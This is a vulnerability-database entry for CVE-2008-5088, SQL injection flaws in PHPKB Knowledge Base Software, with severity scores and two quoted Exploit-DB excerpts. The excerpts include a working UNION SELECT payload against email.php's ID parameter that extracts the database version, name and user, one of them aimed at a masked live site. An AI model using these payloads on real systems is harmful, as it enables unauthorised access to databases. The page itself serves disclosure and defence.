CVE-2008-5088
published 2008-11-14CVE-2008-5088: Multiple SQL injection vulnerabilities in PHPKB Knowledge Base Software 1.5 Professional allow remote attackers to execute arbitrary SQL commands via the ID…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.98%
57.9th percentile
Multiple SQL injection vulnerabilities in PHPKB Knowledge Base Software 1.5 Professional allow remote attackers to execute arbitrary SQL commands via the ID parameter to (1) email.php and (2) question.php, a different vector than CVE-2008-1909.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| knowledgebase-script | phpkb_knowledge_base_software | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections
exploitdb·2010-05-10
CVE-2008-5088 PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections
PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections
---
[+] {In The Name Of Allah The Mercifull}
[+]
[~] Tybe: PHPKB Knowledge Base Software v2 Multilanguage Support Multi SQL Injection Vulnerabilities
[~] Vendor: www.knowledgebase-script.com
[+] Software:PHPKB Knowledge Base Software v2 Multilanguage Support
[-]
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY ---->((4.!.5))
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 3.Jan.2010
[?] T!ME: 04:15 am GMT
[?] Home: © Offensive Security
[?]
[?]
[-]{DEV!L'5 of SYST3M}
# SQL Injection #1 - email.php ID
[*] Err0r C0N50L3:
http://127.0.0.1/email.php?ID={EV!L EXPLO!T}
[*]{EV!L EXPLO!T}
1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*
# SQL Injection #2 - comment.ph
Exploit-DB
PHPKB 1.5 Professional - Multiple SQL Injections
exploitdb·2008-09-21
CVE-2008-5088 PHPKB 1.5 Professional - Multiple SQL Injections
PHPKB 1.5 Professional - Multiple SQL Injections
---
[~] PHPKB Knowledge Base Software v1.5 Professional (email.php) - SQL Injection Vulnerability
[~]
[~] http://www.knowledgebase-script.com
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 20.09.2007
[~]
[~]
[~] [email protected]
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest|Gibon|Pig
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/email.php?ID=SQL
[~]
[~] Demo :-
[~]
[~]
[~] http://xxxx.com/email.php?ID=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*
[~]
[~]---------------------------
No writeups or analysis indexed.
2008-11-14
Published